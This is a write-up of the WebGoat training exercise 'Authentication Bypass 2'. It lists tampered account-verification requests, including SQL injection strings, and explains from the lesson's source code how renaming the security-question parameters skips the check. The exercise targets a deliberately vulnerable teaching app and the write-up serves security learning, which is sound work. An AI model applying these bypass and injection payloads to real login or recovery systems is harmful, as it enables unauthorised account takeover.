After reading both the previous lesson and the example in this one, Let’s go ahead and fill and submit the form
From Burp HTTP history the request is clean enough, so let’s try to modify the request, I personally have tried all the following modifications
secQuestion0=teacher&secQuestion1=street&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746jsEnabled=0&verifyMethod=SEC_QUESTIONS&userId=12309746jsEnabled=1&verifyMethod=NONE&userId=12309746jsEnabled=1&verifyMethod=&userId=12309746jsEnabled=0&verifyMethod=NONE&userId=12309746secQuestion0=&secQuestion1=&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746secQuestion0=&secQuestion1=&jsEnabled=1&verifyMethod=NONE&userId=12309746secQuestion0=&secQuestion1=&jsEnabled=0&verifyMethod=SEC_QUESTIONS&userId=12309746secQuestion0=&secQuestion1=&jsEnabled=1&verifyMethod=&userId=12309746secQuestion0=&secQuestion1=&jsEnabled=0&verifyMethod=&userId=12309746secQuestion0=teacher&secQuestion1=street&jsEnabled=1&verifyMethod=NONE&userId=12309746secQuestion0=teacher&secQuestion1=street&jsEnabled=0&verifyMethod=SEC_QUESTIONS&userId=12309746secQuestion0=teacher' or '1'='1&secQuestion1=street' or '1'='1&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746secQuestion0=teacher' or '1'='1';--&secQuestion1=street' or '1'='1';--&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746
I tried these and many more test…but I was not getting anything from WebGoat
Since I was stuck I went on the WebGoat Git Repository on GitHub, which, I admit, can be considered cheating — https://github.com/WebGoat/WebGoat
Went on looking for the lesson source and found it on VerifyAccount.java
In VerifyAccount.java, inside the completed() function, the HTTP parameters are put in a HashMap by the parseSecQuestions() function
This function gets all parameters from the HTTP request and returns all the parameters which contain “secQuestion” as a HashMap
After the parameters are returned as a HashMap, there is a didUserLikelyCheat() function that checks that I am not using the static properties values in AccountVerificationHelper.java to complete the lesson
And finally there is a verifyAccount() function which checks if the number of parameters is correct and if I am using the static properies values from the source code once again
So to pass the completed() function successfully I have to:
- Get the parameters from the request to the HashMap by means of the parseSecQuestions() function
- Get a “true” from the verifyAccount() function by
— passing the right number of parameters
— do not pass a secQuestion0 parameter or it will be checked
— do not pass a secQuestion1 parameter or it will be checked
But from the parseSecQuestions() I see that to pass parameters to verifyAccount() they must contain the string “secQuestion”, so why not try to use “secQuestionA” and “secQuestionB” ?
By passing the same values but in parameters named “secQuestionA” and “secQuestionB” the lesson is completed
In fact, anything with the proper pattern is a solution for this lesson, as long as the number of parameters matches that of an untampered request
secQuestion2=teacher&secQuestion3=street&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746secQuestion=teacher&secQuestionB=street&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746AAAsecQuestion=teacher&BBBsecQuestion=street&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746AAAsecQuestionA=teacher&BBBsecQuestionB=street&jsEnabled=1&verifyMethod=SEC_QUESTIONS&userId=12309746
And this concludes WebGoat Authentication Bypass 2
I hope you liked it
PVXs — https://twitter.com/pivixih
